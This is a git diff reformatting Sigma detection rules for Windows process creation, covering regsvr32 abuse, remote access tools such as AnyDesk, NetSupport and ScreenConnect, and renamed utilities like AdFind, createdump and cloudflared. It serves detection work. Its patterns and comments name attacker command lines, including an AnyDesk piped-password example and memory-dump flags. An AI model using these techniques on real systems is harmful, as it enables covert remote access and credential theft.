a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml index 9c12fa559..c3193038b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml @@ -1,11 +1,10 @@ title: Scripting/CommandLine Process Spawned Regsvr32 id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22 related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects various command line and scripting engines/processes such as - "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. +description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. references: - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -30,14 +29,13 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter_main_rpcproxy: - CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll' + CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll' ParentProcessName: C:\Windows\System32\cmd.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. - Apply additional filter and exclusions as necessary + - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary - Some legitimate Windows services -level: medium +level: medium # Can be reduced to low if you experience a ton of FP ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml index 890195330..061293e7c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml @@ -1,8 +1,7 @@ title: Regsvr32 DLL Execution With Uncommon Extension id: 50919691-7302-437f-8e10-1fe088afa145 status: test -description: Detects a "regsvr32" execution where the DLL doesn't contain a common - file extension. +description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ author: Florian Roth (Nextron Systems) @@ -20,26 +19,25 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE filter_main_legit_ext: - CommandLine|contains: + CommandLine|contains: + # Note: For better accuracy you might not want to use contains - .ax - .cpl - - .dll + - .dll # Covers ".dll.mui" - .ocx filter_optional_pascal: - CommandLine|contains: .ppl + CommandLine|contains: .ppl filter_optional_avg: - CommandLine|contains: .bav + CommandLine|contains: .bav filter_main_null_4688: - CommandLine: null + CommandLine: filter_main_empty_4688: - CommandLine: '' - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + CommandLine: '' + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Other legitimate extensions currently not in the list either from third party - or specific Windows components. + - Other legitimate extensions currently not in the list either from third party or specific Windows components. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml index a8036ffd3..b2a5e4c32 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml @@ -2,20 +2,12 @@ title: Remote Access Tool - AnyDesk Execution id: b52e84a3-029e-4529-b09b-71d19dd27e94 status: test related: - - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 - type: similar -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' + - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 + type: similar +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: frack113 @@ -32,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \AnyDesk.exe - - Description: AnyDesk - - Product: AnyDesk - - Company: AnyDesk Software GmbH + - NewProcessName|endswith: \AnyDesk.exe + - Description: AnyDesk + - Product: AnyDesk + - Company: AnyDesk Software GmbH condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml index 87ac7d06a..7d12ac958 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - AnyDesk Piped Password Via CLI id: b1377339-fda6-477a-b455-ac0923f9ec2c status: test -description: Detects piping the password to an anydesk instance via CMD and the '--set-password' - flag. +description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: + # Example: C:\WINDOWS\system32\cmd.exe /C cmd.exe /c echo J9kzQ2Y0qO |C:\ProgramData\anydesk.exe --set-password - '/c ' - 'echo ' - .exe --set-password diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml index 91c1947c0..7ca7a1dd2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml @@ -1,12 +1,11 @@ title: Remote Access Tool - AnyDesk Silent Installation id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9 status: test -description: Detects AnyDesk Remote Desktop silent installation. Which can be used - by attackers to gain remote access. +description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. references: - https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20 - https://support.anydesk.com/Automatic_Deployment -author: "J\xE1n Tren\u010Dansk\xFD" +author: Ján Trenčanský date: 2021/08/06 modified: 2023/03/05 tags: @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - --install - --start-with-win - --silent diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml index 38bde01c0..71d23f064 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml @@ -1,21 +1,13 @@ title: Remote Access Tool - Anydesk Execution From Suspicious Folder id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 related: - - id: b52e84a3-029e-4529-b09b-71d19dd27e94 - type: similar + - id: b52e84a3-029e-4529-b09b-71d19dd27e94 + type: similar status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: Florian Roth (Nextron Systems) @@ -32,12 +24,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \AnyDesk.exe - - Description: AnyDesk - - Product: AnyDesk - - Company: AnyDesk Software GmbH + - NewProcessName|endswith: \AnyDesk.exe + - Description: AnyDesk + - Product: AnyDesk + - Company: AnyDesk Software GmbH filter: - NewProcessName|contains: + NewProcessName|contains: - \AppData\ - Program Files (x86)\AnyDesk - Program Files\AnyDesk diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml index 9b759b4b7..85d32a0c6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - NetSupport Execution From Unusual Location id: 37e8d358-6408-4853-82f4-98333fca7014 status: test -description: Detects execution of client32.exe (NetSupport RAT) from an unusual location - (outside of 'C:\Program Files') +description: Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,13 +17,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \client32.exe - - Product|contains: NetSupport Remote Control - - OriginalFileName|contains: client32.exe - - Imphash: a9d50692e95b79723f3e76fcf70d023e - - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e + - NewProcessName|endswith: \client32.exe + - Product|contains: NetSupport Remote Control + - OriginalFileName|contains: client32.exe + - Imphash: a9d50692e95b79723f3e76fcf70d023e + - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Program Files\ - C:\Program Files (x86)\ condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml index 92fdd5ce3..b2a0e9c3c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - RURAT Execution From Unusual Location id: e01fa958-6893-41d4-ae03-182477c5e77d status: test -description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location - (outside of 'C:\Program Files') +description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \rutserv.exe - - \rfusclient.exe - - Product: Remote Utilities + - NewProcessName|endswith: + - \rutserv.exe + - \rfusclient.exe + - Product: Remote Utilities filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Program Files\Remote Utilities - C:\Program Files (x86)\Remote Utilities condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml index 75b560e14..ada6032f5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Suspicious Execution id: 75bfe6e6-cd8e-429e-91d3-03921e1d7962 status: test -description: Detects ScreenConnect program starts that establish a remote access to - that system (not meeting, not remote support) +description: Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support) references: - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies author: Florian Roth (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - e=Access& - y=Guest& - '&p=' diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml index bffff1ce9..4172417d0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Backstage Mode Anomaly id: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 status: test -description: Detects suspicious sub processes started by the ScreenConnect client - service, which indicates the use of the so-called Backstage mode +description: Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode references: - https://www.mandiant.com/resources/telegram-malware-iranian-espionage - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: ScreenConnect.ClientService.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml index 89b8fc337..0bcf7800e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml @@ -19,13 +19,14 @@ detection: selection_parent: ParentProcessName|endswith: \ScreenConnect.ClientService.exe selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: \TEMP\ScreenConnect\ + # Example: + # CommandLine: "cmd.exe" /c "C:\Windows\TEMP\ScreenConnect\23.6.8.8644\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd" + CommandLine|contains: \TEMP\ScreenConnect\ condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily - used. + - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml index bba6caff4..e2f08c4c6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml @@ -1,9 +1,7 @@ title: Discovery of a System Time id: b243b280-65fe-48df-ba07-6ddea7646427 status: test -description: Identifies use of various commands to query a systems time. This technique - may be used before executing a scheduled task or to discover the time zone of - a target system. +description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. references: - https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md @@ -21,16 +19,15 @@ detection: EventID: 4688 Channel: Security selection_time: - CommandLine|contains: time - NewProcessName|endswith: + CommandLine|contains: time + NewProcessName|endswith: - \net.exe - \net1.exe selection_w32tm: - CommandLine|contains: tz - NewProcessName|endswith: \w32tm.exe + CommandLine|contains: tz + NewProcessName|endswith: \w32tm.exe condition: process_creation and (1 of selection_*) falsepositives: - - Legitimate use of the system utilities to discover system time for legitimate - reason + - Legitimate use of the system utilities to discover system time for legitimate reason level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml index bee04672a..110e1fa5d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml @@ -1,9 +1,7 @@ title: Renamed AdFind Execution id: df55196f-f105-44d3-a675-e9dfb6cc2f2b status: test -description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen - across majority of breaches. It is used to domain trust discovery to plan out - subsequent steps in the attack chain. +description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain. references: - https://www.joeware.net/freetools/tools/adfind/ - https://thedfirreport.com/2020/05/08/adfind-recon/ @@ -28,7 +26,7 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes @@ -49,16 +47,16 @@ detection: - computers_active - computers_pwdnotreqd selection_2: - - Imphash: - - bca5675746d13a1f246e2da3c2217492 - - 53e117a96057eaf19c41380d0e87f1c2 - - Hashes|contains: - - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 - - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 + - Imphash: + - bca5675746d13a1f246e2da3c2217492 + - 53e117a96057eaf19c41380d0e87f1c2 + - Hashes|contains: + - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 + - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 selection_3: OriginalFileName: AdFind.exe filter: - NewProcessName|endswith: \AdFind.exe + NewProcessName|endswith: \AdFind.exe condition: process_creation and (1 of selection* and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml index 2cb36da85..4ed9b9893 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml @@ -1,15 +1,10 @@ title: Renamed AutoIt Execution id: f4264e47-f522-4c38-a420-04525d5b880f status: experimental -description: 'Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. - - AutoIt is a scripting language and automation tool for Windows systems. While - primarily used for legitimate automation tasks, it can be misused in cyber attacks. - - Attackers can leverage AutoIt to create and distribute malware, including keyloggers, - spyware, and botnets. A renamed AutoIt executable is particularly suspicious. - - ' +description: | + Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. + AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. + Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious. references: - https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w - https://www.autoitscript.com/site/ @@ -27,25 +22,25 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - ' /AutoIt3ExecuteScript' - ' /ErrorStdOut' selection_2: - - Imphash: - - fdc554b3a8683918d731685855683ddf - - cd30a61b60b3d60cecdb034c8c83c290 - - f8a00c72f2d667d2edbb234d0c0ae000 - - Hashes|contains: - - IMPHASH=FDC554B3A8683918D731685855683DDF - - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 - - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 + - Imphash: + - fdc554b3a8683918d731685855683ddf # AutoIt v2 - doesn't cover all binaries + - cd30a61b60b3d60cecdb034c8c83c290 # AutoIt v2 - doesn't cover all binaries + - f8a00c72f2d667d2edbb234d0c0ae000 # AutoIt v3 - doesn't cover all binaries + - Hashes|contains: + - IMPHASH=FDC554B3A8683918D731685855683DDF # AutoIt v2 - doesn't cover all binaries + - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 # AutoIt v2 - doesn't cover all binaries + - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 # AutoIt v3 - doesn't cover all binaries selection_3: OriginalFileName: - AutoIt3.exe - AutoIt2.exe - AutoIt.exe filter_main_legit_name: - NewProcessName|endswith: + NewProcessName|endswith: - \AutoIt.exe - \AutoIt2.exe - \AutoIt3_x64.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml index c2bb2bfe9..f823351c3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml @@ -1,8 +1,7 @@ title: Renamed BrowserCore.EXE Execution id: 8a4519e8-e64a-40b6-ae85-ba8ad2177559 status: test -description: Detects process creation with a renamed BrowserCore.exe (used to extract - Azure tokens) +description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) references: - https://twitter.com/mariuszbit/status/1531631015139102720 author: Max Altgelt (Nextron Systems) @@ -21,7 +20,7 @@ detection: selection: OriginalFileName: BrowserCore.exe filter_realbrowsercore: - NewProcessName|endswith: \BrowserCore.exe + NewProcessName|endswith: \BrowserCore.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml index 843d981dc..787a91db1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml @@ -21,23 +21,23 @@ detection: EventID: 4688 Channel: Security selection_cleanup: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' selection_tunnel: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' - '-token ' selection_accountless: - CommandLine|contains|all: + CommandLine|contains|all: - -url - tunnel selection_hashes: @@ -81,7 +81,7 @@ detection: - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 filter_main_known_names: - NewProcessName|endswith: + NewProcessName|endswith: - \cloudflared.exe - \cloudflared-windows-386.exe - \cloudflared-windows-amd64.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml index 8e2eefd02..ce40101a5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml @@ -1,11 +1,10 @@ title: Renamed CreateDump Utility Execution id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e related: - - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 - type: similar + - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 + type: similar status: test -description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to - dump process memory +description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://twitter.com/bopin2020/status/1366400799199272960 @@ -26,16 +25,16 @@ detection: selection_pe: OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - - CommandLine|contains|all: - - ' -u ' - - ' -f ' - - .dmp - - CommandLine|contains|all: - - ' --full ' - - ' --name ' - - .dmp + - CommandLine|contains|all: + - ' -u ' # Short version of '--full' + - ' -f ' # Short version of '--name' + - .dmp + - CommandLine|contains|all: + - ' --full ' # Short version of '--full' + - ' --name ' # Short version of '--name' + - .dmp filter: - NewProcessName|endswith: \createdump.exe + NewProcessName|endswith: \createdump.exe condition: process_creation and (1 of selection_* and not filter) falsepositives: - Command lines that use the same flags diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml index 84c50c1ba..e3215dc53 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml @@ -1,8 +1,7 @@ title: Renamed CURL.EXE Execution id: 7530cd3d-7671-43e3-b209-976966f6ea48 status: experimental -description: Detects the execution of a renamed "CURL.exe" binary based on the PE - metadata fields +description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields references: - https://twitter.com/Kostastsale/status/1700965142828290260 author: X__Junior (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: curl.exe - - Description: The curl executable + - OriginalFileName: curl.exe + - Description: The curl executable filter_main_img: - NewProcessName|contains: \curl + NewProcessName|contains: \curl condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml index 305df9dbc..60c365e96 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml @@ -1,8 +1,7 @@ title: Renamed Gpg.EXE Execution id: ec0722a3-eb5c-4a56-8ab2-bf6f20708592 status: experimental -description: Detects the execution of a renamed "gpg.exe". Often used by ransomware - and loaders to decrypt/encrypt data. +description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. references: - https://securelist.com/locked-out/68960/ author: Nasreddine Bencherchali (Nextron Systems), frack113 @@ -20,7 +19,7 @@ detection: selection: OriginalFileName: gpg.exe filter_main_img: - NewProcessName|endswith: + NewProcessName|endswith: - \gpg.exe - \gpg2.exe condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml index f6c0d0efd..fc30766e4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml @@ -1,8 +1,7 @@ title: Renamed NetSupport RAT Execution id: 0afbd410-de03-4078-8491-f132303cb67d status: test -description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via - Imphash, Product and OriginalFileName strings +description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection: - - Product|contains: NetSupport Remote Control - - OriginalFileName|contains: client32.exe - - Imphash: a9d50692e95b79723f3e76fcf70d023e - - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E + - Product|contains: NetSupport Remote Control + - OriginalFileName|contains: client32.exe + - Imphash: a9d50692e95b79723f3e76fcf70d023e + - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E filter: - NewProcessName|endswith: \client32.exe + NewProcessName|endswith: \client32.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml index 4695ee0d8..48ad9759b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml @@ -17,26 +17,26 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: - - Excel.exe - - MSACCESS.EXE - - MSPUB.EXE - - OneNote.exe - - OneNoteM.exe - - OUTLOOK.EXE - - POWERPNT.EXE - - WinWord.exe - - Description: - - Microsoft Access - - Microsoft Excel - - Microsoft OneNote - - Microsoft Outlook - - Microsoft PowerPoint - - Microsoft Publisher - - Microsoft Word - - Sent to OneNote Tool + - OriginalFileName: + - Excel.exe + - MSACCESS.EXE + - MSPUB.EXE + - OneNote.exe + - OneNoteM.exe + - OUTLOOK.EXE + - POWERPNT.EXE + - WinWord.exe + - Description: + - Microsoft Access + - Microsoft Excel + - Microsoft OneNote + - Microsoft Outlook + - Microsoft PowerPoint + - Microsoft Publisher + - Microsoft Word + - Sent to OneNote Tool filter_main_legit_names: - NewProcessName|endswith: + NewProcessName|endswith: - 